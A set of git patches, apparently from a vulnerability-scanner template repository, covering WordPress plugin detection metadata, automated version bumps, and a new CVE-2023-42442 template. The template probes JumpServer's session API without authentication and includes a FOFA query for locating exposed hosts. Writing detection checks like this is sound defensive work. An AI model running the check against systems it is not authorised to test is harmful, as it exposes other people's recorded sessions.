diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 47f97458af0bf017ca44aee9edc0033cdcf0f14f Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Sep 2023 16:14:04 +0530
Subject: [PATCH 0465/1090] Create CVE-2023-42442.yaml

---
 http/cves/2023/CVE-2023-42442.yaml | 40 ++++++++++++++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-42442.yaml

diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml
new file mode 100644
index 0000000000..6ab536c1cd
--- /dev/null
+++ b/http/cves/2023/CVE-2023-42442.yaml
@@ -0,0 +1,40 @@
+id: CVE-2023-42442
+
+info:
+  name: JumpServer > 3.6.4 - Information Disclosure
+  author: xianke
+  severity: high
+  description: |
+    JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).
+  reference:
+    - https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-42442
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="JumpServer"
+  tags: cve,cve2023,jumpserver,exposure
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/v1/terminal/sessions/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"terminal":'
+          - '"user_id":"'
+          - '"account_id":'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - application/json
+
+      - type: status
+        status:
+          - 200

From 4bb24f54664d3b0d039b5fd443edea035978ab3a Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 21 Sep 2023 04:02:28 +0000
Subject: [PATCH 0466/1090] Auto WordPress Plugins Update [Thu Sep 21 04:02:28
 UTC 2023] :robot:

---
 helpers/wordpress/plugins/astra-sites.txt                      | 2 +-
 helpers/wordpress/plugins/complianz-gdpr.txt                   | 2 +-
 helpers/wordpress/plugins/elementor.txt                        | 2 +-
 helpers/wordpress/plugins/google-listings-and-ads.txt          | 2 +-
 helpers/wordpress/plugins/imsanity.txt                         | 2 +-
 helpers/wordpress/plugins/jetpack.txt                          | 2 +-
 helpers/wordpress/plugins/kadence-blocks.txt                   | 2 +-
 helpers/wordpress/plugins/members.txt                          | 2 +-
 helpers/wordpress/plugins/meta-box.txt                         | 2 +-
 helpers/wordpress/plugins/newsletter.txt                       | 2 +-
 helpers/wordpress/plugins/nextend-facebook-connect.txt         | 2 +-
 helpers/wordpress/plugins/premium-addons-for-elementor.txt     | 2 +-
 helpers/wordpress/plugins/simple-custom-post-order.txt         | 2 +-
 helpers/wordpress/plugins/siteorigin-panels.txt                | 2 +-
 helpers/wordpress/plugins/woocommerce-services.txt             | 2 +-
 http/technologies/wordpress/plugins/ad-inserter.yaml           | 1 -
 http/technologies/wordpress/plugins/add-to-any.yaml            | 1 -
 http/technologies/wordpress/plugins/admin-menu-editor.yaml     | 1 -
 .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 -
 http/technologies/wordpress/plugins/akismet.yaml               | 1 -
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml        | 1 -
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml   | 1 -
 .../wordpress/plugins/all-in-one-wp-migration.yaml             | 1 -
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 -
 http/technologies/wordpress/plugins/amp.yaml                   | 1 -
 http/technologies/wordpress/plugins/antispam-bee.yaml          | 1 -
 http/technologies/wordpress/plugins/astra-sites.yaml           | 1 -
 http/technologies/wordpress/plugins/astra-widgets.yaml         | 1 -
 http/technologies/wordpress/plugins/autoptimize.yaml           | 1 -
 http/technologies/wordpress/plugins/backwpup.yaml              | 1 -
 http/technologies/wordpress/plugins/better-search-replace.yaml | 1 -
 http/technologies/wordpress/plugins/better-wp-security.yaml    | 1 -
 .../wordpress/plugins/black-studio-tinymce-widget.yaml         | 1 -
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml      | 1 -
 http/technologies/wordpress/plugins/breeze.yaml                | 1 -
 http/technologies/wordpress/plugins/broken-link-checker.yaml   | 1 -
 .../wordpress/plugins/child-theme-configurator.yaml            | 1 -
 http/technologies/wordpress/plugins/classic-editor.yaml        | 1 -
 http/technologies/wordpress/plugins/classic-widgets.yaml       | 1 -
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml          | 1 -
 http/technologies/wordpress/plugins/cmb2.yaml                  | 1 -
 http/technologies/wordpress/plugins/coblocks.yaml              | 1 -
 http/technologies/wordpress/plugins/code-snippets.yaml         | 1 -
 http/technologies/wordpress/plugins/coming-soon.yaml           | 1 -
 http/technologies/wordpress/plugins/complianz-gdpr.yaml        | 1 -
 .../wordpress/plugins/contact-form-7-honeypot.yaml             | 1 -
 http/technologies/wordpress/plugins/contact-form-7.yaml        | 1 -
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml    | 1 -
 http/technologies/wordpress/plugins/cookie-law-info.yaml       | 1 -
 http/technologies/wordpress/plugins/cookie-notice.yaml         | 1 -
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml    | 1 -
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml   | 1 -
 http/technologies/wordpress/plugins/custom-css-js.yaml         | 1 -
 http/technologies/wordpress/plugins/custom-fonts.yaml          | 1 -
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml   | 1 -
 http/technologies/wordpress/plugins/disable-comments.yaml      | 1 -
 http/technologies/wordpress/plugins/disable-gutenberg.yaml     | 1 -
 http/technologies/wordpress/plugins/duplicate-page.yaml        | 1 -
 http/technologies/wordpress/plugins/duplicate-post.yaml        | 1 -
 http/technologies/wordpress/plugins/duplicator.yaml            | 1 -
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml     | 1 -
 http/technologies/wordpress/plugins/easy-fancybox.yaml         | 1 -
 .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 -
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml          | 1 -
 http/technologies/wordpress/plugins/elementor.yaml             | 1 -
 http/technologies/wordpress/plugins/elementskit-lite.yaml      | 1 -
 http/technologies/wordpress/plugins/enable-media-replace.yaml  | 1 -
 http/technologies/wordpress/plugins/envato-elements.yaml       | 1 -
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 -
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml  | 1 -
 .../wordpress/plugins/facebook-for-woocommerce.yaml            | 1 -
 http/technologies/wordpress/plugins/fast-indexing-api.yaml     | 1 -
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml     | 1 -
 http/technologies/wordpress/plugins/flamingo.yaml              | 1 -
 http/technologies/wordpress/plugins/fluentform.yaml            | 1 -
 http/technologies/wordpress/plugins/font-awesome.yaml          | 1 -
 .../wordpress/plugins/force-regenerate-thumbnails.yaml         | 1 -
 http/technologies/wordpress/plugins/formidable.yaml            | 1 -
 http/technologies/wordpress/plugins/forminator.yaml            | 1 -
 http/technologies/wordpress/plugins/ga-google-analytics.yaml   | 1 -
 .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 -
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml   | 1 -
 .../wordpress/plugins/google-analytics-for-wordpress.yaml      | 1 -
 .../wordpress/plugins/google-listings-and-ads.yaml             | 1 -
 http/technologies/wordpress/plugins/google-site-kit.yaml       | 1 -
 .../wordpress/plugins/google-sitemap-generator.yaml            | 1 -
 http/technologies/wordpress/plugins/gtranslate.yaml            | 1 -
 http/technologies/wordpress/plugins/gutenberg.yaml             | 1 -
 .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 -
 .../wordpress/plugins/header-footer-code-manager.yaml          | 1 -
 .../wordpress/plugins/header-footer-elementor.yaml             | 1 -
 http/technologies/wordpress/plugins/header-footer.yaml         | 1 -
 http/technologies/wordpress/plugins/health-check.yaml          | 1 -
 http/technologies/wordpress/plugins/hello-dolly.yaml           | 1 -
 http/technologies/wordpress/plugins/host-webfonts-local.yaml   | 1 -
 http/technologies/wordpress/plugins/imagify.yaml               | 1 -
 http/technologies/wordpress/plugins/imsanity.yaml              | 1 -
 .../wordpress/plugins/insert-headers-and-footers.yaml          | 1 -
 http/technologies/wordpress/plugins/instagram-feed.yaml        | 3 +--
 .../wordpress/plugins/intuitive-custom-post-order.yaml         | 1 -
 http/technologies/wordpress/plugins/iwp-client.yaml            | 1 -
 http/technologies/wordpress/plugins/jetpack-boost.yaml         | 1 -
 http/technologies/wordpress/plugins/jetpack.yaml               | 1 -
 http/technologies/wordpress/plugins/kadence-blocks.yaml        | 1 -
 http/technologies/wordpress/plugins/kirki.yaml                 | 1 -
 http/technologies/wordpress/plugins/leadin.yaml                | 1 -
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml       | 1 -
 http/technologies/wordpress/plugins/limit-login-attempts.yaml  | 1 -
 http/technologies/wordpress/plugins/litespeed-cache.yaml       | 1 -
 http/technologies/wordpress/plugins/loco-translate.yaml        | 1 -
 http/technologies/wordpress/plugins/loginizer.yaml             | 1 -
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml      | 1 -
 http/technologies/wordpress/plugins/mailpoet.yaml              | 1 -
 http/technologies/wordpress/plugins/maintenance.yaml           | 1 -
 http/technologies/wordpress/plugins/mainwp-child.yaml          | 1 -
 http/technologies/wordpress/plugins/malcare-security.yaml      | 1 -
 http/technologies/wordpress/plugins/megamenu.yaml              | 1 -
 http/technologies/wordpress/plugins/members.yaml               | 1 -
 http/technologies/wordpress/plugins/meta-box.yaml              | 1 -
 http/technologies/wordpress/plugins/ml-slider.yaml             | 1 -
 http/technologies/wordpress/plugins/newsletter.yaml            | 1 -
 .../wordpress/plugins/nextend-facebook-connect.yaml            | 1 -
 http/technologies/wordpress/plugins/nextgen-gallery.yaml       | 1 -
 http/technologies/wordpress/plugins/ninja-forms.yaml           | 1 -
 http/technologies/wordpress/plugins/ocean-extra.yaml           | 1 -
 .../wordpress/plugins/official-facebook-pixel.yaml             | 1 -
 http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 -
 http/technologies/wordpress/plugins/optinmonster.yaml          | 1 -
 http/technologies/wordpress/plugins/otter-blocks.yaml          | 1 -
 http/technologies/wordpress/plugins/password-protected.yaml    | 1 -
 http/technologies/wordpress/plugins/pdf-embedder.yaml          | 1 -
 .../wordpress/plugins/pinterest-for-woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/pixelyoursite.yaml         | 1 -
 http/technologies/wordpress/plugins/polylang.yaml              | 1 -
 http/technologies/wordpress/plugins/popup-builder.yaml         | 1 -
 http/technologies/wordpress/plugins/popup-maker.yaml           | 1 -
 http/technologies/wordpress/plugins/post-smtp.yaml             | 1 -
 http/technologies/wordpress/plugins/post-types-order.yaml      | 1 -
 .../wordpress/plugins/premium-addons-for-elementor.yaml        | 1 -
 http/technologies/wordpress/plugins/pretty-link.yaml           | 1 -
 http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 -
 http/technologies/wordpress/plugins/really-simple-ssl.yaml     | 1 -
 http/technologies/wordpress/plugins/redirection.yaml           | 1 -
 http/technologies/wordpress/plugins/redux-framework.yaml       | 1 -
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 -
 http/technologies/wordpress/plugins/safe-svg.yaml              | 1 -
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml      | 1 -
 http/technologies/wordpress/plugins/sg-cachepress.yaml         | 1 -
 http/technologies/wordpress/plugins/sg-security.yaml           | 1 -
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml   | 1 -
 .../wordpress/plugins/shortpixel-image-optimiser.yaml          | 1 -
 .../wordpress/plugins/simple-custom-post-order.yaml            | 1 -
 http/technologies/wordpress/plugins/siteguard.yaml             | 1 -
 http/technologies/wordpress/plugins/siteorigin-panels.yaml     | 1 -
 http/technologies/wordpress/plugins/smart-slider-3.yaml        | 1 -
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml     | 1 -
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 -
 http/technologies/wordpress/plugins/sucuri-scanner.yaml        | 1 -
 http/technologies/wordpress/plugins/svg-support.yaml           | 1 -
 .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 -
 http/technologies/wordpress/plugins/tablepress.yaml            | 1 -
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml  | 1 -
 http/technologies/wordpress/plugins/the-events-calendar.yaml   | 1 -
 http/technologies/wordpress/plugins/themeisle-companion.yaml   | 1 -
 http/technologies/wordpress/plugins/tinymce-advanced.yaml      | 1 -
 .../wordpress/plugins/translatepress-multilingual.yaml         | 1 -
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml       | 1 -
 .../wordpress/plugins/under-construction-page.yaml             | 1 -
 http/technologies/wordpress/plugins/updraftplus.yaml           | 1 -
 http/technologies/wordpress/plugins/use-any-font.yaml          | 1 -
 http/technologies/wordpress/plugins/user-role-editor.yaml      | 1 -
 .../wordpress/plugins/velvet-blues-update-urls.yaml            | 1 -
 http/technologies/wordpress/plugins/w3-total-cache.yaml        | 1 -
 .../wordpress/plugins/webp-converter-for-media.yaml            | 1 -
 http/technologies/wordpress/plugins/webp-express.yaml          | 1 -
 .../wordpress/plugins/widget-importer-exporter.yaml            | 1 -
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml       | 1 -
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml       | 1 -
 .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 -
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml   | 1 -
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml          | 1 -
 http/technologies/wordpress/plugins/woocommerce-payments.yaml  | 1 -
 .../wordpress/plugins/woocommerce-paypal-payments.yaml         | 1 -
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml        | 1 -
 http/technologies/wordpress/plugins/woocommerce-services.yaml  | 1 -
 http/technologies/wordpress/plugins/woocommerce.yaml           | 1 -
 http/technologies/wordpress/plugins/wordfence.yaml             | 1 -
 http/technologies/wordpress/plugins/wordpress-importer.yaml    | 1 -
 http/technologies/wordpress/plugins/wordpress-seo.yaml         | 1 -
 http/technologies/wordpress/plugins/worker.yaml                | 1 -
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml      | 1 -
 http/technologies/wordpress/plugins/wp-file-manager.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-google-maps.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml          | 1 -
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml   | 1 -
 http/technologies/wordpress/plugins/wp-migrate-db.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml    | 1 -
 http/technologies/wordpress/plugins/wp-optimize.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-pagenavi.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-reset.yaml              | 1 -
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-rollback.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-seopress.yaml           | 1 -
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml       | 1 -
 http/technologies/wordpress/plugins/wp-smushit.yaml            | 1 -
 http/technologies/wordpress/plugins/wp-statistics.yaml         | 1 -
 http/technologies/wordpress/plugins/wp-super-cache.yaml        | 1 -
 http/technologies/wordpress/plugins/wp-user-avatar.yaml        | 1 -
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml       | 1 -
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml        | 1 -
 http/technologies/wordpress/plugins/wpforms-lite.yaml          | 1 -
 http/technologies/wordpress/plugins/wps-hide-login.yaml        | 1 -
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 -
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml           | 1 -
 215 files changed, 16 insertions(+), 216 deletions(-)

diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt
index 8cf6caf561..a423d4217b 100644
--- a/helpers/wordpress/plugins/astra-sites.txt
+++ b/helpers/wordpress/plugins/astra-sites.txt
@@ -1 +1 @@
-3.4.1
\ No newline at end of file
+3.4.2
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt
index 73092f345e..c19261717b 100644
--- a/helpers/wordpress/plugins/complianz-gdpr.txt
+++ b/helpers/wordpress/plugins/complianz-gdpr.txt
@@ -1 +1 @@
-6.5.3
\ No newline at end of file
+6.5.4
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt
index bc3bd8b4d8..afb053553c 100644
--- a/helpers/wordpress/plugins/elementor.txt
+++ b/helpers/wordpress/plugins/elementor.txt
@@ -1 +1 @@
-3.16.3
\ No newline at end of file
+3.16.4
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt
index 1b03fe63dd..6de6d05565 100644
--- a/helpers/wordpress/plugins/google-listings-and-ads.txt
+++ b/helpers/wordpress/plugins/google-listings-and-ads.txt
@@ -1 +1 @@
-2.5.6
\ No newline at end of file
+2.5.7
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/imsanity.txt b/helpers/wordpress/plugins/imsanity.txt
index cae9add96b..642c63c424 100644
--- a/helpers/wordpress/plugins/imsanity.txt
+++ b/helpers/wordpress/plugins/imsanity.txt
@@ -1 +1 @@
-2.8.2
\ No newline at end of file
+2.8.3
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt
index 7ef6ffeed5..f32f950cd9 100644
--- a/helpers/wordpress/plugins/jetpack.txt
+++ b/helpers/wordpress/plugins/jetpack.txt
@@ -1 +1 @@
-12.5
\ No newline at end of file
+12.6
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt
index dd82ce6db5..3b1c19fdee 100644
--- a/helpers/wordpress/plugins/kadence-blocks.txt
+++ b/helpers/wordpress/plugins/kadence-blocks.txt
@@ -1 +1 @@
-3.1.16
\ No newline at end of file
+3.1.19
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/members.txt b/helpers/wordpress/plugins/members.txt
index 6a3913b049..132d9f7707 100644
--- a/helpers/wordpress/plugins/members.txt
+++ b/helpers/wordpress/plugins/members.txt
@@ -1 +1 @@
-3.2.7
\ No newline at end of file
+3.2.8
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/meta-box.txt b/helpers/wordpress/plugins/meta-box.txt
index 72cf891338..885bc9f72d 100644
--- a/helpers/wordpress/plugins/meta-box.txt
+++ b/helpers/wordpress/plugins/meta-box.txt
@@ -1 +1 @@
-5.7.5
\ No newline at end of file
+5.8.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/newsletter.txt b/helpers/wordpress/plugins/newsletter.txt
index 5dae366723..fe36ece50b 100644
--- a/helpers/wordpress/plugins/newsletter.txt
+++ b/helpers/wordpress/plugins/newsletter.txt
@@ -1 +1 @@
-7.9.3
\ No newline at end of file
+7.9.4
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/nextend-facebook-connect.txt b/helpers/wordpress/plugins/nextend-facebook-connect.txt
index 7d8ebf9eef..edcc0e556c 100644
--- a/helpers/wordpress/plugins/nextend-facebook-connect.txt
+++ b/helpers/wordpress/plugins/nextend-facebook-connect.txt
@@ -1 +1 @@
-3.1.9
\ No newline at end of file
+3.1.10
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
index 73395042af..a01f0240aa 100644
--- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt
+++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt
@@ -1 +1 @@
-4.10.7
\ No newline at end of file
+4.10.8
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/simple-custom-post-order.txt b/helpers/wordpress/plugins/simple-custom-post-order.txt
index 1b03fe63dd..6de6d05565 100644
--- a/helpers/wordpress/plugins/simple-custom-post-order.txt
+++ b/helpers/wordpress/plugins/simple-custom-post-order.txt
@@ -1 +1 @@
-2.5.6
\ No newline at end of file
+2.5.7
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/siteorigin-panels.txt b/helpers/wordpress/plugins/siteorigin-panels.txt
index b89cbe1901..53effa101a 100644
--- a/helpers/wordpress/plugins/siteorigin-panels.txt
+++ b/helpers/wordpress/plugins/siteorigin-panels.txt
@@ -1 +1 @@
-2.26.0
\ No newline at end of file
+2.26.1
\ No newline at end of file
diff --git a/helpers/wordpress/plugins/woocommerce-services.txt b/helpers/wordpress/plugins/woocommerce-services.txt
index fd06a9268d..3b26524868 100644
--- a/helpers/wordpress/plugins/woocommerce-services.txt
+++ b/helpers/wordpress/plugins/woocommerce-services.txt
@@ -1 +1 @@
-2.3.4
\ No newline at end of file
+2.3.5
